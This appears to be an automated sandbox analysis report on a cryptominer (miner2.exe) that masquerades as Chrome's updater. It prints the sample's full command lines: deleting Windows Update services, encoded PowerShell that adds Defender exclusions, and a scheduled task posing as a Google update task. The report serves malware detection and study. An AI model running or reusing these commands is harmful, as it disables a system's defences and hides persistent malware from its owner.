| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files\Google\Chrome\updater.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files\Google\Chrome\updater.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Temp\miner2.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\updater.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe
"C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe"
C:\Windows\Temp\miner2.exe
"C:\Windows\Temp\miner2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAcABsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBpAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB6AHMAIwA+AA=="
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAYgAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBHAFkAQQBkAEEAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGEAdwBCAHEAQQBIAGsAQQBJAHcAQQArAEEAQQA9AD0AIgAnACkAIAA8ACMAeABsACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAZwBsAHAAbwAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGgAeQBjAGgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBiAHYAawBjACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwAbQBpAG4AZQByADIALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBzAGIAawBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBuAHQAcABhACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGYAdAAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAawBqAHkAIwA+AA=="
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAcABsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBpAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB6AHMAIwA+AA=="
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "duhwxeji"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
Files
memory/2648-1-0x0000000075110000-0x00000000758C1000-memory.dmp
memory/2648-0-0x0000000000410000-0x00000000006A6000-memory.dmp
memory/2648-2-0x00000000050E0000-0x00000000050F0000-memory.dmp
memory/2648-3-0x0000000005060000-0x0000000005061000-memory.dmp
memory/2648-4-0x0000000006530000-0x00000000067C0000-memory.dmp
C:\Windows\Temp\miner2.exe
| MD5 | 64fa4d87885a9c469eccb0439e255741 |
| SHA1 | 62b9d1398abde05f7cd300dcc91610d7a69c3321 |
| SHA256 | 539950d10b9fe26e543bae99259d4734538c7c872015553b2000269f7dd66232 |
| SHA512 | 19b2d066bfcfad55a75f863814dd21acfbaeded535d671d7660bc32a3f77569519fa3692d906aaeb4b59c3e36f529c3e2ef5d809c2602790b365db1c23a16792 |
C:\Windows\Temp\miner2.exe
| MD5 | c6451e29590ab9da28fe5eb7467248b4 |
| SHA1 | 7089977d643b0937c8ef437b868465c27d279980 |
| SHA256 | 5e81cac27a3cc7dc28e0c72f5caa6e327e98e0efb0a624ca86c6d21ea32963e2 |
| SHA512 | e990dcbdc8b3dc09274628d85a1c887c708e7e30b5ba51fa5a989636fa23d0151f375243b8b5dea28c2d555f5647ce017fad8685daabd3d89dd85aaa21461766 |
C:\Windows\Temp\miner2.exe
| MD5 | 8b66eab88b56e35421bd98201aa21ce0 |
| SHA1 | a20cc5f21f948905f892e20e2fc57eb7f1160139 |
| SHA256 | dbd0c9edcb29fcf870b3ae1625a030c4dc71c24c6e2f32c7affc52667ab6cbe8 |
| SHA512 | e4da409d93859f10347b182a5942e858dfd0dfcf2de3b07dcd02ee590cf181172276339c1d26ca3ba24e287aa3f3c4e13114fc9a8295bc7655393b526ed4803e |
memory/2648-17-0x0000000075110000-0x00000000758C1000-memory.dmp
memory/3228-19-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp
memory/3228-18-0x00000000007D0000-0x0000000000A5E000-memory.dmp
memory/3228-20-0x000000001C6D0000-0x000000001C6E0000-memory.dmp
memory/3228-21-0x0000000001460000-0x0000000001461000-memory.dmp
memory/3540-31-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp
memory/3540-30-0x000001D9EFE90000-0x000001D9EFEB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rgrhst1h.2s1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3540-33-0x000001D9EFF30000-0x000001D9EFF40000-memory.dmp
memory/3540-32-0x000001D9EFF30000-0x000001D9EFF40000-memory.dmp
memory/3540-34-0x000001D9EFF30000-0x000001D9EFF40000-memory.dmp
memory/3540-35-0x000001D9EFF30000-0x000001D9EFF40000-memory.dmp
memory/3540-38-0x000001D9F0040000-0x000001D9F018F000-memory.dmp
memory/3540-39-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp
memory/3228-40-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp
memory/3228-41-0x000000001C6D0000-0x000000001C6E0000-memory.dmp
memory/3228-42-0x0000000003690000-0x00000000036A2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 627073ee3ca9676911bee35548eff2b8 |
| SHA1 | 4c4b68c65e2cab9864b51167d710aa29ebdcff2e |
| SHA256 | 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c |
| SHA512 | 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb |
memory/4432-52-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp
memory/4432-53-0x0000017A5B320000-0x0000017A5B330000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7d760ca2472bcb9fe9310090d91318ce |
| SHA1 | cb316b8560b38ea16a17626e685d5a501cd31c4a |
| SHA256 | 5c362b53c4a4578d8b57c51e1eac15f7f3b2447e43e0dad5102ecd003d5b41d4 |
| SHA512 | 141e8661d7348ebbc1f74f828df956a0c6e4cdb70f3b9d52623c9a30993bfd91da9ed7d8d284b84f173d3e6f47c876fb4a8295110895f44d97fd6cc4c5659c35 |
memory/4432-55-0x0000017A5B320000-0x0000017A5B330000-memory.dmp
memory/4432-58-0x0000017A5B470000-0x0000017A5B5BF000-memory.dmp
memory/4432-59-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp
memory/3228-62-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp
memory/1408-63-0x0000022525E70000-0x0000022525E80000-memory.dmp
memory/1408-61-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp
